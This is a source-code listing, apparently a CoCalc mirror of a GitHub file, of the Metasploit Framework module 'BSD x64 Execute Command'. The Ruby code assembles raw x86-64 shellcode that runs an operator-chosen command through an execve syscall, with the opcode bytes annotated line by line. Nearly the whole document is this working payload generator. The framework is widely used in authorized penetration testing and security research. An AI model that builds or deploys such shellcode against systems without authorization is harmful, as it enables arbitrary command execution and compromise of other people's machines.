Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/bsd/x64/exec.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
###
7
#
8
# Exec
9
# ----
10
#
11
# Executes an arbitrary command.
12
#
13
###
14
module MetasploitModule
15
CachedSize = 31
16
17
include Msf::Payload::Single
18
include Msf::Payload::Bsd
19
20
def initialize(info = {})
21
super(
22
merge_info(
23
info,
24
'Name' => 'BSD x64 Execute Command',
25
'Description' => 'Execute an arbitrary command',
26
'Author' => 'joev',
27
'License' => MSF_LICENSE,
28
'Platform' => 'bsd',
29
'Arch' => ARCH_X64
30
)
31
)
32
33
# Register exec options
34
register_options(
35
[
36
OptString.new('CMD', [ true, 'The command string to execute' ]),
37
]
38
)
39
end
40
41
#
42
# Dynamically builds the exec payload based on the user's options.
43
#
44
def generate(_opts = {})
45
cmd_str = datastore['CMD'] || ''
46
# Split the cmd string into arg chunks
47
cmd_parts = Shellwords.shellsplit(cmd_str)
48
cmd_parts = ([cmd_parts.first] + (cmd_parts[1..] || []).reverse).compact
49
arg_str = cmd_parts.map { |a| "#{a}\x00" }.join
50
call = "\xe8" + [arg_str.length].pack('V')
51
"\x48\x31\xd2"+ # xor rdx, rdx
52
call + # call CMD.len
53
arg_str + # CMD
54
"\x5f" + # pop rdi
55
if cmd_parts.length > 1
56
"\x48\x89\xf9" + # mov rcx, rdi
57
"\x52" + # push rdx (null)
58
# for each arg, push its current memory location on to the stack
59
cmd_parts[1..].each_with_index.map do |_arg, idx|
60
"\x48\x81\xc1" + # add rcx + ...
61
[cmd_parts[idx].length + 1].pack('V') +
62
"\x51" # push rcx (build str array)
63
end.join
64
else
65
"\x52" # push rdx (null)
66
end +
67
"\x57"+ # push rdi
68
"\x48\x89\xe6"+ # mov rsi, rsp
69
"\x48\x31\xc0"+ # xor rax, rax
70
"\x48\x83\xc8\x3b" + # or rax, 0x3b (execve)
71
"\x0f\x05" # syscall
72
end
73
end
74
75